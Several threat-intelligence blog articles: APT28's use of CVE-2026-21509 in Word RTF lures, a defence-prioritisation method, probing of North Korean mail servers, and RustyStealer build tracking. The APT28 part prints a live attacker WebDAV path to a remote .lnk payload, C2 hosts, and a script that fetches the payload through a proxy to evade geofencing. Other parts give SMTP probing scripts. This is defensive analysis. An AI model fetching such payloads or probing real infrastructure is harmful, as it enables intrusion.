Since the beginning of this year, we have again observed an increased number of attacks by APT28 targeting various European countries. In multiple campaigns, the group actively leverages the Microsoft Office vulnerability CVE-2026-21509 as an initial access vector.
This article focuses on how CVE-2026-21509 is used in practice, how relevant IOCs can be extracted efficiently from weaponized Word documents, and how the actor's own geofencing can be leveraged to infer operational target regions.
Before diving into the analysis, a brief look at CVE-2026-21509 itself.
Understanding CVE-2026-21509
CVE-2026-21509 is a Microsoft Office vulnerability affecting how embedded OLE objects are validated during document processing. Microsoft classifies it as a security feature bypass, which is accurate but undersells the actual problem: Office makes trust decisions based on internal object metadata that originates directly from the document itself. The vulnerability does not rely on macros, scripts or external templates; it is triggered during normal parsing of specially crafted RTF documents. From a user perspective, the document appears inert. There are no prompts, no warnings and nothing that would suggest active content.
The exploit uses RTF control words such as \object and \objdata to embed raw binary data inside the document. During parsing, Word reconstructs this data into in-memory OLE structures, effectively rebuilding Compound File Binary objects on the fly. This reconstruction step is where the vulnerability is exposed.
The reconstructed OLE objects are deliberately malformed. Their headers look plausible, but their internal structure is inconsistent. Strict parsers reject them. Word does not. It continues processing and enters code paths that assume a coherent internal state. Observed samples frequently use OLE Package objects and legacy COM class identifiers associated with historically risky components. By manipulating how these objects are represented internally, the Office checks meant to block them are bypassed, not by disabling protections, but by misleading the logic that decides whether those protections apply.
The document itself contains no payload. Its sole purpose is to reach a state where Office processes an object it should not trust. Any follow-on activity happens later and outside the document. This separation between exploit and payload fits well with current intrusion chains.
From a defensive POV, this explains why CVE-2026-21509 is easy to miss. Static analysis shows no macros, no external relationships and no obvious indicators. The malicious structures only exist after Word reconstructs them, which places the exploit below the visibility of most document scanning and macro-focused controls.
tldr;
CVE-2026-21509 is a Microsoft Office vulnerability that allows attackers to bypass internal security checks when Word processes embedded OLE objects. The issue is triggered during normal document parsing and does not rely on macros, scripts or external content. A specially crafted RTF document embeds malformed OLE objects that Word reconstructs in memory. Office then makes security decisions based on this reconstructed data, even though it originates from the untrusted document. By manipulating that data, an attacker can cause Word to accept and process objects that should normally be blocked.
The document itself contains no payload and appears harmless under static analysis. Exploitation happens entirely inside Word's parsing and object handling logic, below the level where most document scanners operate.
Analyzed Samples
For this analysis, I looked at the following samples:
When I receive potentially malicious Word documents, my first step is usually to run oleid. In most common malicious documents, this already reveals macros, external references or other active content.
In this case, oleid reports a clean file. No macros, no external relationships, no obvious indicators.
This is expected.
The document is not a classic OLE container but an RTF file. In RTF, embedded objects are stored as hexadecimal data inside the document body using control words such as \object and \objdata. These objects do not exist as real OLE structures until Word parses the document and reconstructs them in memory.
oleid operates at the container level. It can only detect features that already exist as structured objects in the file. Since the embedded OLE data is still plain text at this stage, there is nothing for oleid to flag.
The exploit surface of CVE-2026-21509 only becomes visible after this reconstruction step. Tools like rtfobj replicate this part of Word's parsing logic by extracting and rebuilding the embedded objects from the RTF stream.
rtfobj -s all b2ba51b4491da8604ff9410d6e004971e3cd9a321390d0258e294ac42010b546.doc
Once reconstructed, the embedded objects are clearly malformed. They resemble OLE containers but fail validation by strict parsers, which is exactly the condition the vulnerability relies on.
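If you want to feed the reconstructed objects straight into further tooling instead of using the CLI, the same step can be scripted with oletools. A minimal sketch (the file name and the object_XX.bin naming are placeholders, and the attribute names assume the current oletools rtfobj API):
# Sketch: rebuild the embedded OLE objects from the RTF stream with oletools,
# mirroring what "rtfobj -s all" does on the command line.
from oletools import rtfobj

data = open("sample.doc", "rb").read()        # RTF content despite the .doc extension
parser = rtfobj.RtfObjParser(data)
parser.parse()

for i, obj in enumerate(parser.objects):
    print(f"[{i}] offset=0x{obj.start:x} class={obj.class_name!r}")
    if obj.is_ole and obj.oledata:
        # dump the reconstructed object for closer inspection (xxd, strings, ...)
        with open(f"object_{i:02d}.bin", "wb") as out:
            out.write(obj.oledata)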
After extracting the embedded objects, I inspected the resulting files using xxd. At this stage, strings did not yield anything particularly useful, which is not surprising given that the document is not designed to carry a readable payload.
From this data, the following strings could be extracted:
Paths like file://wellnessmedcare.org/davwwwroot/pol/Downloads/document.lnk?init=1 are chosen to force specific Windows and Office code paths.
Using file:// changes how Office interprets the access. The resource is treated as a file system object, not as web content. This affects which security checks are applied and how trust is evaluated. Mark-of-the-Web handling and web-centric protections do not apply in the same way as they would for http or https.
The davwwwroot path forces WebDAV. This causes Windows to access the resource via the WebClient service, exposing the remote content as a network-like file system. WebDAV remains a special case in Windows, where remote files are often handled similarly to local or SMB resources.
The .lnk file is the actual target. The Word document contains no payload and performs no execution itself. Its sole purpose is to reach a state where access to the remote resource is allowed. Shortcut files are attractive because they can execute commands or load further components while being subject to different checks than executables or scripts, especially when accessed through WebDAV.
The query parameter is client-side only. It is used to avoid caching and to reliably trigger initial access behavior. It has no functional relevance for the server.
In the context of CVE-2026-21509, this fits cleanly. The vulnerability causes Office to make incorrect trust decisions during document parsing. Once that decision is made, accessing a remote shortcut via a file:// WebDAV path becomes possible without macros, scripts or explicit downloads.
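To pull these indicators out of the dumped objects at scale, a simple regex sweep is usually enough. A small sketch, assuming the objects were dumped as object_XX.bin as in the snippet above (the NUL-stripping pass is a crude but workable way to catch UTF-16LE strings):
import re
from pathlib import Path

url_re = re.compile(rb"file://[\x21-\x7e]+")       # printable, non-space ASCII after the scheme

hits = set()
for dump in Path(".").glob("object_*.bin"):
    raw = dump.read_bytes()
    for blob in (raw, raw.replace(b"\x00", b"")):  # second pass catches UTF-16LE storage
        for match in url_re.findall(blob):
            hits.add((dump.name, match.decode(errors="replace")))

for name, url in sorted(hits):
    print(name, url)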
Identifying Targets
While analyzing the documents and extracted URLs, it became apparent that they reference potential target regions:
/cz/ -> Czech Republic
/buch/ -> Bucharest / Romania
/pol/ -> Poland
Additional indicators inside the Word documents further support this assessment:
Romanian language content
References to Ukraine
Mentions of Slovenia
EU-related context
None of this is accidental.
At this point, the next step is validation. Russian threat actors are known to rely heavily on geofencing and APT28 is no exception. Fortunately, this behavior can be turned into a useful source of intelligence for us ^-^
Turning Geofencing into Intelligence
The first step was to take a closer look at the domains extracted from the samples:
wellnessmedcare.org
193.187.148.169
freefoodaid.com
159.253.120.2
What stands out here is the choice of hosting locations. Both IP addresses resolve to providers in Romania and Moldova. It is reasonable to assume that these locations were selected based on the campaign's intended target regions.
Next, I attempted to replicate the WebDAV requests generated by Windows in order to test the observed geofencing behavior. To do this, I executed the document in a sandbox and captured the resulting network traffic.
Geofence Analysis
To validate the geofencing, I needed to determine which proxy locations were required to access the malicious resources without being blocked. After identifying suitable proxies, I performed test requests using a custom script, once without a proxy and once using a Romanian proxy.
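The script itself is nothing special. A stripped-down sketch of the idea looks roughly like this; the proxy endpoint is a placeholder, and the target URL is derived from the file:// path observed in the sample (davwwwroot typically maps to the web root when the WebClient builds its HTTP request):
import requests

# HTTP form of the WebDAV resource seen in the sample
TARGET = "http://wellnessmedcare.org/pol/Downloads/document.lnk?init=1"

def check(proxy=None):
    proxies = {"http": proxy, "https": proxy} if proxy else None
    r = requests.get(TARGET, proxies=proxies, timeout=20, allow_redirects=False)
    return r.status_code

print("direct        :", check())                                  # expected: 403
print("romanian proxy:", check("http://ro-proxy.example:8080"))    # expected: 200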
Without proxy:
With proxy:
The result is fairly clear. Requests originating from outside the expected regions are rejected with HTTP 403, while requests routed through a Romanian proxy succeed. This pattern can be used to validate likely operational target regions.
Out of 114 tested countries, only three were allowed access: Czech Republic, Poland and Romania. This aligns perfectly with the indicators observed earlier in the documents and URLs.
As this example shows, defensive measures such as geofencing can provide valuable intelligence when analyzed properly. Even access control mechanisms can leak information about an actor's operational focus if you know where to look. The second domain, freefoodaid.com, was already offline at the time of analysis. Given how short-lived APT28 infrastructure tends to be, this is hardly surprising. It is reasonable to assume that similar geofencing behavior would have been observable there as well, but for demonstration purposes, the remaining data is more than sufficient.
How to protect against these attacks
Update Microsoft Office and enforce a structured update routine. Treat unexpected Word documents as untrusted and have them analyzed before opening them. (or stop using windows :3)
Conclusion
CVE-2026-21509 works because it fits neatly into how Office processes documents today. The exploit relies on internal object reconstruction, not on macros or embedded payloads, which makes it easy to overlook during initial analysis. The surrounding tradecraft follows a familiar pattern. WebDAV paths, remote shortcut files and strict geofencing have been used by APT28 before and continue to show up in current campaigns. The technique is stable, requires little user interaction and avoids most of the controls that organizations typically rely on. At the same time, this setup exposes useful signals. Geofencing decisions, hosting locations and access behavior provide insight into intended target regions when tested systematically. In this case, the infrastructure behavior aligns closely with the indicators found inside the documents.
From an analytical perspective, the value lies less in the exploit itself and more in what can be inferred from how it is deployed and constrained.
Much of my previous work has focused on understanding threat actors not through individual malware samples alone, but through infrastructure, operational behavior, and strategic intent. Over time, a recurring problem became increasingly difficult to ignore:
While our visibility into attacker tradecraft continues to improve, our ability to decide what to defend first often does not.
Most security frameworks excel at describing what exists (techniques, controls, and best practices) but remain largely silent on what should matter most when resources are limited or when a specific threat actor becomes relevant. Instead of introducing another generic framework, this article applies an actor-centric prioritization methodology focused on attacker intent and impact. This approach emerged from a practical need I repeatedly encountered: organizations often had technically sound controls in place, yet still failed to prevent strategic loss, because their defensive investments were misaligned with the attacker's actual objectives.
Why ACDP Was Developed
Actor-Centric Defensive Prioritization (ACDP) was developed to address a persistent gap between threat intelligence and defensive decision-making.
Threat intelligence typically answers questions such as:
Who is active?
What techniques are being used?
Defensive planning, however, must answer different questions:
What failure would be unacceptable?
Which controls meaningfully disrupt this actor's strategy?
In real world environments, especially those facing state-aligned or destructive actors, it is rarely feasible to implement every recommended control simultaneously. Prioritization becomes inevitable.
ACDP exists to make that prioritization explicit, defensible, and actor-aware.
What Makes This Approach Different
ACDP does not attempt to replace established frameworks such as MITRE ATT&CK or NIST. Instead, it operates one level above them, using their outputs as inputs.
Its defining characteristic is a deliberate shift in perspective:
from technique coverage to strategic disruption
from static maturity models to adaptive decision-making
from generic best practices to context-driven trade-offs
The result is a reasoned ordering of defensive actions, based on how much they interfere with an adversary's intent and how much damage they prevent if that interference fails.
Advantages of an Actor-Centric Approach
The strengths of ACDP are primarily practical:
ACDP enables rapid reprioritization when threat actor relevance changes
It aligns defensive investment with attacker objectives instead of abstract risk scores
It acknowledges budget and operational constraints instead of assuming ideal conditions
It helps explain why certain controls take priority, a critical factor in both technical and executive discussions
Most importantly: ACDP encourages organizations to think in terms of losing conditions, not only detection coverage
Limitations and Trade-Offs
ACDP is not without drawbacks.
Because it is actor-centric, its effectiveness depends on the quality of the underlying threat intelligence. Incorrect assumptions about attacker intent can lead to misplaced priorities. Additionally, ACDP does not provide prescriptive control definitions or implementation guidance. It assumes foundational security hygiene already exists and focuses solely on ordering, not designing, defensive measures. Finally, ACDP deliberately avoids the comfort of exhaustive coverage. It forces uncomfortable decisions, choosing what not to prioritize, which may challenge existing security narratives.
A Practical Motivation
The motivation behind ACDP is operational necessity
In environments where time, budget, and certainty are constrained, security decisions must be made before all information is available. ACDP provides a structured way to make those decisions without pretending that all risks are equal.
If defensive priorities do not change when attacker intent changes, prioritization is no longer strategic
ACDP in Practice: Quantified Prioritization Example
This section demonstrates how ACDP produces concrete priorities, using a scoring example against Sandworm.
Step 0: Define the Objective Profile
Based on historical and current operations, Sandworm is modeled as a:
Destructive, state-aligned actor prioritizing strategic impact over access longevity
This assumption directly influences weighting.
Step 1: Define the Scoring Axes
Each defensive control is evaluated across four axes.
Axis A: Actor Disruption Value (ADV)
How strongly does this control interfere with the actor's campaign strategy?
5 = Breaks or invalidates the strategy
4 = Forces significant tradecraft change
3 = Causes friction
2 = Minor inconvenience
1 = Negligible effect
Axis B: Impact Risk Reduction (IRR)
How much real damage does this control prevent if the actor succeeds elsewhere?
5 = Prevents catastrophic / irreversible impact
4 = Strongly limits blast radius
3 = Partial damage reduction
2 = Minimal reduction
1 = Cosmetic
Axis C: Cost & Operational Complexity (CC)
How realistic is implementation under time and budget pressure?
5 = Low cost, low friction
4 = Moderate effort
3 = Manageable complexity
2 = High effort
1 = Very expensive / disruptive
Axis D: Detection-to-Decision Time (DDT)
Does this control provide usable signal early enough to change outcomes?
5 = Immediate / pre-impact
4 = Early warning
3 = Delayed but actionable
2 = Mostly reactive
1 = Post-incident only
Step 2: Actor-Specific Weighting
For a destructive actor, impact prevention and strategic disruption dominate:
This is basically the mathematical expression of attacker intent.
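To make the arithmetic concrete, here is a small sketch of how the weighted score can be computed. The weights and the example controls below are illustrative assumptions on my part, not values prescribed by ACDP:
# Illustrative weights for a destructive actor: impact (IRR) and disruption (ADV)
# dominate, cost (CC) and detection timing (DDT) matter less. Assumed values.
WEIGHTS = {"ADV": 0.35, "IRR": 0.35, "CC": 0.15, "DDT": 0.15}

def acdp_score(adv, irr, cc, ddt):
    scores = {"ADV": adv, "IRR": irr, "CC": cc, "DDT": ddt}
    return sum(WEIGHTS[axis] * scores[axis] for axis in WEIGHTS)

# Hypothetical controls with hypothetical axis scores (ADV, IRR, CC, DDT)
controls = {
    "Offline, tested backups":        (3, 5, 4, 2),
    "OT/IT network segmentation":     (4, 5, 2, 3),
    "Egress filtering / C2 blocking": (4, 3, 4, 4),
}

for name, axes in sorted(controls.items(), key=lambda kv: -acdp_score(*kv[1])):
    print(f"{acdp_score(*axes):.2f}  {name}")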
Why the Calculation Matters
Without explicit scoring:
prioritization becomes opinion
decisions become political
trade-offs remain implicit
ACDP forces those trade-offs into the open.
If you cannot explain your priorities numerically, you are not prioritizing: you are rationalizing
Closing Thoughts
More often than not, security failures are caused not by missing controls, but by misaligned priorities. ACDP was developed to address this misalignment by shifting the focus from technique coverage to attacker intent, and from abstract risk to tangible impact. Its value lies in deliberate selection. Used correctly, ACDP does not replace existing frameworks, but sharpens them by forcing uncomfortable but necessary decisions. This methodology is intentionally opinionated!
If you have any feedback or questions, please feel free to contact me by email. I welcome criticism and feedback!
Today I stumbled over a rather accidental finding during a routine analysis of North Korean infrastructure that I would like to share with you. Since North Korea does not exactly use the internet for legitimate purposes and is well known for a long history of attacks against (critical) infrastructure, I consider it reasonable to treat essentially all North Korean internet-facing infrastructure as a threat entity by default. Infrastructure changes often reveal far more about a threat actor than individual malware samples ever will and the same applies to nation states like North Korea. That is precisely why this infrastructure deserves continuous observation.
For clarity: no offensive actions were performed during this analysis. Everything shown here is based exclusively on publicly accessible data and very basic reconnaissance. Even if the target happens to be North Korean infrastructure, operating within legal boundaries remains mandatory. Germany unfortunately does not always make this easy, but whatever.
Enough about that. Let’s get into the analysis.
Initial Discovery
Due to a historic DNS leak, we currently have a surprisingly large collection of publicly reachable websites hosted inside North Korea. I scanned these sites for email addresses because I was curious about the current state of their mail infrastructure. I had looked into this years ago but lost track of it over time. Back then, heavy geofencing was common and many services were blocked outright, so the obvious question was whether this still applies today (it does not).
For this quick assessment, I focused on two sites:
The domain appears to be used purely for identity, not routing
According to WHOIS (if we trust it), the domain was registered in 2025 via juming.com, a registrar I would generously describe as “economically efficient” rather than reputable.
Beyond that, there is essentially no public footprint for this domain.
Inference
There appears to be a deliberate separation between:
Routing identity: .kp domains
Cryptographic identity: .cc domain
Imo, this is a deliberate architectural decision and not an accident
Private State PKI (StarJV Certificate Authority)
Observations
Custom internal CA visible in the certificate
Not publicly trusted
Self-managed
Extremely primitive X.509 v1 structure
Inference
Active internal PKI operation
Low compliance and security maturity
No external trust anchor available or desired
X.509 Version 1 Certificate
Observations
Certificate is Version 1 (no extensions, no SAN, no policy constraints)
Inference
Outdated or minimal PKI toolchain
No modern security modeling
Functionality prioritized over governance
Primitive Serial Number (0x1000)
Observations
Serial number equals exactly 4096
Inference
Manual or simplistic CA automation
No randomness
Likely very small PKI scale
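Both observations are easy to reproduce. A minimal sketch using smtplib plus the cryptography package; the hostname below is a placeholder, and I am assuming STARTTLS on port 25 as seen on the mail gateway:
import smtplib
import ssl
from cryptography import x509

ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE                      # accept the untrusted internal CA

with smtplib.SMTP("mail.example.invalid", 25, timeout=15) as smtp:   # placeholder host
    smtp.starttls(context=ctx)
    der = smtp.sock.getpeercert(binary_form=True)    # raw DER of the presented certificate

cert = x509.load_der_x509_certificate(der)
print("version:", cert.version)                      # Version.v1 -> no extensions, no SAN
print("serial :", hex(cert.serial_number))           # 0x1000 would match the observation above
print("issuer :", cert.issuer.rfc4514_string())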
Multi-Identity on a Single Host
Observations
PTR: ryongnamsan.edu.kp
SMTP banner: star-co.net.kp
TLS CN: mail.nisp.cc
Inference
Central gateway role
Multi-tenant usage
Organizational consolidation
No MX Records for nisp.cc
Observations
Domain exists, but has no mail routing
Inference
Domain serves exclusively as an identity anchor
No end-user mail usage
Reduced abuse exposure
Extremely Large Mail Size (~10 GB)
Observations
SMTP SIZE = 10,000,000,000 bytes
Honestly, I laughed out loud when I saw this.
This configuration appears consistently on both active Star-CO SMTP servers (smtp and smtp1.star-co.net.kp), which suggests it is intentional rather than a misconfiguration. In contrast, the Silibank mail server uses a much more reasonable limit of ~100 MB. It is therefore reasonable to assume that these mail servers are being used to transfer very large files. In theory, this could even serve as a transport channel for bulk data movement, including data returning from North Korean remote workers abroad. This remains speculative, but the transport capacity itself is undeniable.
If you want to make yourself vulnerable to a denial-of-service attack, you should implement this feature yourself!
Inference
Expectation of large payload transfers
SMTP likely used as a general-purpose transport channel
No restrictive transport policies
Legacy Features Enabled (VRFY, ETRN)
Observations
User verification enabled
Legacy store-and-forward mechanisms active
Inference
Weak hardening discipline
Legacy configuration not cleaned up
Reliance on network isolation as primary security model
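All of the SMTP-level observations above (banner, SIZE, VRFY/ETRN) can be reproduced with a few lines of smtplib. A sketch with a placeholder hostname:
import smtplib

def probe(host):
    with smtplib.SMTP(host, 25, timeout=15) as smtp:
        code, banner = smtp.ehlo()                        # EHLO response lists the extensions
        print(banner.decode(errors="replace"))
        print("advertised SIZE:", smtp.esmtp_features.get("size"))
        print("VRFY offered   :", smtp.has_extn("vrfy"))
        print("ETRN offered   :", smtp.has_extn("etrn"))

probe("smtp.example.invalid")                             # placeholder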
Unknown SMTP Extension (BBBBBBBB)
Observations
Non-standard SMTP extension
Inference
Bug, custom patch, or QA deficiency
Poor implementation hygiene
Recent Activity (Domain 2025 / Certificate 2024)
Observations
Domain registered recently
Certificate relatively fresh
Inference
Active modernization or reorganization
Not a purely legacy environment
Temporal Correlation & Strategic Context
We do not perform this kind of analysis purely for entertainment value. The objective is to generate intelligence that may become operationally relevant over time. That means we also need to ask why these infrastructure changes occurred when they did.
Based on available timestamps:
Certificate issuance: 23 Nov 2024
Domain registration: 21 Aug 2025
November 2024: Certificate Issuance
This period coincides with a phase of increased North Korean geopolitical activity:
Formalization of a comprehensive strategic partnership with Russia
Ongoing missile testing and military signaling
Escalating rhetoric toward South Korea, the US, and Japan
Partial reopening of diplomatic channels post-pandemic
Interpretation
The certificate appears to have been issued ahead of this intensified phase. A plausible explanation is preparatory technical groundwork: stabilizing externally reachable infrastructure before increased international activity or visibility.
August 2025: Domain Registration
In this period we saw:
Continued military demonstrations
Publicized return of North Korean personnel from Russia
Increased diplomatic engagement with Russia and China
Rising international visibility
There is no single triggering political event on this exact date. However, the broader trend shows increased outward-facing engagement.
Interpretation
Registering an externally usable domain such as nisp.cc may reflect a desire to make services more reliably reachable and interoperable internationally during a phase of expanding external activity.
Possible Infrastructure Bridging Function
Even without explicit political announcements, infrastructure often moves first.
It is entirely plausible that North Korea:
began improving external visibility of selected services
equipped gateways with internationally compatible identities
prepared controlled external access paths for future operational needs
Such changes rarely happen accidentally in centralized environments.
Final Thoughts: Why This Matters
Much of today's threat intelligence still revolves around malware samples, campaign names, and short-lived indicators of compromise. That perspective is fundamentally insufficient when dealing with nation states. States themselves act as long-term threat actors. Their infrastructure evolves far more slowly than malware and when it does change, it usually means someone made a deliberate decision, signed off on a budget, and probably sat through far too many internal meetings.
Infrastructure artifacts quietly expose things most actors would rather not advertise:
organizational maturity (or the lack thereof)
centralization models
operational priorities
capacity planning assumptions
risk tolerance
and governance culture
A single TLS certificate, a misaligned identity domain, or an absurdly permissive transport policy can easily reveal more about an actor's operational reality than dozens of shiny malware samples ever could. Sometimes the most valuable intelligence comes from reading what a system accidentally tells you about itself. This small case demonstrates how even boring protocol metadata can function as durable intelligence signals when correlated properly. Observing infrastructure drift across threat actors or states allows us to detect strategic movement long before it becomes visible in campaigns, headlines, or incident reports. And as a small bonus observation: while geopolitical ambition clearly scales, PKI maturity and configuration hygiene appear to lag slightly behind. Infrastructure may evolve, but governance apparently takes its time ^-^
As already mentioned in my last MuddyWater article, I originally planned to take a closer look at the remaining RustyWater samples in the hope of finding additional leftover artefacts. But: writing a pure “let’s grep a few more binaries for leftovers” follow-up article sounded painfully boring, both to read and to write. So instead of doing that, I decided to version the individual samples properly and build a small change-tracking timeline around them.
Mostly out of curiosity, partly out of stubbornness. At least this way we get something that resembles actual analysis rather than archaeological string hunting.
Before diving into version diffs and timelines, it’s worth briefly grounding what we’re actually dealing with here, without turning this into a full-blown reverse engineering novella.
RustyStealer (sometimes referenced as RustyWater, Archer RAT or related variants in public reporting) is a Rust-based information stealer / RAT that has been observed in MuddyWater-attributed campaigns. In practice it behaves like a fairly typical post-compromise implant: basic host reconnaissance, security product awareness, persistence via registry, C2 communication and modular task execution. Nothing magical, nothing revolutionary, just a modernized tooling stack implemented in Rust instead of the usual C/C++ ecosystem. Here’s an article from cloudseek.com if you are interested in the details of its delivery and execution behavior.
And that’s exactly where this article deliberately does not go: this is not a line-by-line teardown of every decoding routine, syscall wrapper or math loop. There are already reports on the internet that lovingly explain how a single function increments a counter.
What I’m interested in instead is how this thing evolves over time and how to track it
How do the binaries change between builds? Which libs appear or disappear? When does the architecture shift? Where do experiments get rolled back? Which parts get hardened, obfuscated or simplified?
The goal is to treat this malware family more like a software project with a messy commit history than a static artifact. By correlating compile timestamps, dependency fingerprints, fuzzy hashes, embedded artefacts and targeted code diffs, we can reconstruct a surprisingly coherent development timeline and extract signals about tooling maturity, experimentation phases and operational priorities.
And honestly: that’s way more fun than grepping strings all day and more useful for my threat actor research
My First Step: I always start with the most low-effort signal: raw strings. Sometimes you get lucky and developers leave behind absolute paths, usernames, toolchain artefacts or other accidental breadcrumbs.
The first thing I wanted to verify was whether any additional user paths were embedded in the samples:
for x in *.exe; do r="$(strings "$x" | grep 'C:')"; if [ -n "$r" ]; then printf '%s %s\n\n' "$x" "$r"; fi; done
And yes, in two of the binaries we do indeed find another leftover artefact:
C:\Users\Bruno\Desktop\art.exe
C:\Users\Jacob\...
Just to be clear: the developer is almost certainly not named Bruno/Jacob. This is simply the username of the build environment used at that time. Still, it gives us a nice anchor point when correlating samples later on.
Dependency extraction and library fingerprinting:
Next, I wanted to extract the dependency information from the binaries:
# get llvm strings
for x in *.exe; do r="$(strings "$x" | grep 'llvm')"; if [ -n "$r" ]; then printf '%s %s\n\n' "$x" "$r"; fi; done
# get crates with version and write to file sample.exe.strings
for x in *.exe; do strings "$x" | grep "crates\.io-" | cut -d'\' -f5 | sort | uniq >> "$x.strings" ; done
This gives us a list of Rust crates and libraries that were present at build time:
From this output I consolidated a full list of all dependencies observed across all samples. It already allows a first sanity check: are all samples built from the same dependency set or do we see deviations?
In total, the consolidated list contains 50 libraries, however, each individual sample only exposes around 44-45 crates. That already tells us that not all builds are identical.
Here is the full list of observed libraries:
Library  Version
aead  0.5.2
aes  0.8.4
aes-gcm  0.10.3
atomic-waker  1.1.2
base64  0.22.1
bytes  1.10.1
cipher  0.4.4
ctr  0.9.2
futures-channel  0.3.31
futures-core  0.3.31
futures-util  0.3.31
generic-array  0.14.7
h2  0.4.12
hashbrown  0.15.5
http  1.3.1
httparse  1.10.1
http-body-util  1.7.0
hyper  1.7.0
hyper-tls  0.6.0
hyper-util  0.1.16
icu_collections  2.0.0
icu_normalizer  2.0.0
idna  1.1.10
indexmap  2.11.0
ipnet  2.11.0
iri-string  0.7.8
mio  1.0.4
native-tls  0.2.14
percent-encoding  2.3.2
rand  0.6.5
rand_core  0.4.2
rand_hc  0.1.0
rand_jitter  0.1.4
reqwest  0.12.23
schannel  0.1.27
slab  0.4.11
smallvec  1.15.1
socket2  0.6.0
tokio  1.47.1
tokio-native-tls  0.3.1
tokio-util  0.7.16
tower  0.5.2
universal-hash  0.5.1
url  2.5.7
utf8_iter  1.0.4
want  0.3.1
windows-registry  0.5.3
winreg  0.55.0
rustc-demangle  0.1.24
rustc-demangle  0.1.26
Since we now know that differences exist, I built a per-sample matrix to visualize which libraries appear in which binary:
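A quick way to rebuild such a matrix from the *.exe.strings files generated above looks roughly like this (a sketch, not the exact tooling used for the figure):
from pathlib import Path

# one crate-version string per line in each <sample>.exe.strings file
samples = {p.name.removesuffix(".strings"): set(p.read_text().split())
           for p in sorted(Path(".").glob("*.exe.strings"))}
all_libs = sorted(set().union(*samples.values()))

for lib in all_libs:
    row = ["x" if lib in libs else "." for libs in samples.values()]
    print(f"{lib:<35} {' '.join(row)}")
print("columns:", ", ".join(samples))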
This makes deviations immediately visible without having to manually diff text dumps.
Compile timestamps
Before grouping anything, I also checked when the individual binaries were compiled.
This can be extracted using:
for x in *.exe; do printf '%s ' "$x"; objdump -x "$x" | grep "Time/Date"; done
As a final preprocessing step I generated TLSH hashes for all samples.
TLSH is a fuzzy hashing algorithm that does not aim for exact equality, but instead quantifies structural similarity between files. Unlike cryptographic hashes, TLSH allows us to estimate how closely two binaries resemble each other internally even if they differ in resources, padding, timestamps or small code changes.
For our malware analysis purpose, this is especially useful when clustering variants, detecting rebuilds and separating development branches.
To make the distances reproducible, I wrote a small script that computes TLSH values directly from the binaries and performs pairwise comparisons:
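A minimal version of that idea, using the python-tlsh bindings, could look like this (lower distance means more structural similarity):
from itertools import combinations
from pathlib import Path
import tlsh   # pip install python-tlsh

digests = {p.name: tlsh.hash(p.read_bytes()) for p in sorted(Path(".").glob("*.exe"))}

for (a, ha), (b, hb) in combinations(digests.items(), 2):
    print(f"{tlsh.diff(ha, hb):>5}  {a} <-> {b}")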
Clustering the samples
With all of this data available, we can now perform a reasonably robust clustering of the samples.
The key point here is that no single metric decides on its own. Instead, the correlation of multiple independent signals matters:
TLSH similarity
Compile timestamps
Library fingerprints
Embedded user artefacts
Cluster 1: Core codebase
The first cluster represents the actual core of the codebase and contains the samples:
All three share identical lib dependencies and are compiled close together in time, two of them even share the exact same compile timestamp. One sample also contains the user artefact "Bruno", which further hints at a consistent build environment.
Despite moderate TLSH distance to some variants, the internal similarity inside this cluster remains high enough to confidently assume a shared codebase.
Cluster 2: Early feature branch
A second, clearly separable cluster consists solely of:
This sample extends the otherwise stable library stack with an additional winreg dependency while remaining TLSH-close to the core samples. Combined with its earlier compile timestamp, I think this is a temporary feature branch or experiment rather than a fully independent development line.
Cluster 3: Later modernization branch
The build in this cluster differs by multiple additional libraries and introduces a newer version of rustc-demangle. Additionally, a different username ("Jacob") appears in the artefacts. While the TLSH distance still places this sample within the same family, it consistently sits outside the tighter core cluster range. Taken together, this strongly indicates a later development branch with an updated toolchain and likely expanded functionality.
Overall, this results in a three-tier model:
A stable core cluster forming the technical baseline
An early feature branch with minimal extension
A later modernization branch with a changed toolchain and build environment
My clustering is not driven by hash similarity alone; it only becomes reliable through the combined temporal, structural and artefact-based correlation. It also provides insight into development practices, build discipline and potential role separation within the development process of the malware.
Version mapping
Based on this clustering, I derived the following version mapping:
At this point we already have a solid structural overview without having touched the actual code yet. This part comes next.
For the code comparison I use Ghidra's Version Tracking module. The versions will be analyzed in the following pairs:
v0.9 <-> v1.0
v1.0 <-> v1.1
v1.1 <-> v2.0
So three comparisons in total, which honestly is still a very manageable workload.
Let’s get started 🙂
Version Tracking workflow
I won’t go into a full tutorial on how Ghidra's Version Tracking works. Instead, I’ll briefly outline my simple workflow for today.
First, I set the confidence filter to:
-1.0 -> 0.950
Everything above that can usually be assumed identical across samples. I select all those findings and accept them in bulk.
For the remaining findings, I set up a small quality-of-life shortcut:
SHIFT + T = Assign Tag
Then I filter the results by:
Tag (ascending)
Type (ascending)
Status (ascending)
and tighten the confidence filter slightly to:
-1.0 → 0.95
This gives me a clean view of all unresolved function-level differences without assigned tags, exactly the changes that matter most when identifying structural evolution.
It looks roughly like this:
The workflow is simple:
Select the next finding
Open code comparison (SHIFT + C)
If identical -> accept (SHIFT + A)
If different -> assign a tag for later analysis (SHIFT + T)
Once accepted or tagged, the finding disappears from the filtered view and I repeat the process.
I iterate this until all relevant changes are reviewed and documented.
RustyStealer: Evolution from v0.9 to v2.0
What changed, what failed and what the developer learned
During a longitudinal analysis of multiple RustyStealer builds, four development stages became visible: an early baseline version (v0.9), a cleanup iteration (v1.0), a short-lived performance refactor (v1.1) and a more fundamental architectural shift in v2.0.
Rather than showing linear feature growth, the samples show a realistic iterative engineering process with experimentation, rollback and eventual consolidation toward stealth and reliability.
This analysis focuses on behavioral deltas inferred from import-level changes and binary artifacts.
Version 0.9: Early baseline and rough edges
The earliest observed build (v0.9) represents a relatively raw implementation.
Notable characteristics:
Dependency artifacts included unused crates such as winreg / windows-registry (I guess early experimentation or leftover scaffolding)
No meaningful behavioral differences compared to later v1.0 builds
No advanced memory manipulation or cryptographic primitives observed
Limited internal abstraction and minimal architectural complexity
From a development POV, v0.9 looks like a staging build that still contained residual dependencies and experimental code paths that were not yet cleaned up.
Version 1.0: Cleanup and stabilization
The transition from v0.9 to v1.0 did not introduce meaningful functional changes. The most visible difference was the removal of unused dependency artifacts (such as the winreg crate) without any observable change in imports or runtime behavior.
This looks more like a dependency cleanup than a behavioral refactor.
Key observations:
No changes in imported Windows APIs
No observable change in capabilities or execution flow
Binary differences consistent with rebuild noise and dependency graph cleanup
This phase reflects basic project hygiene rather than feature development.
Version 1.1: Performance experiment and internal refactor
Version 1.1 marks the first technically ambitious change.
Major changes observed:
Introduction of asynchronous and overlapped file I/O:
Migration to modern Windows path resolution via SHGetKnownFolderPath.
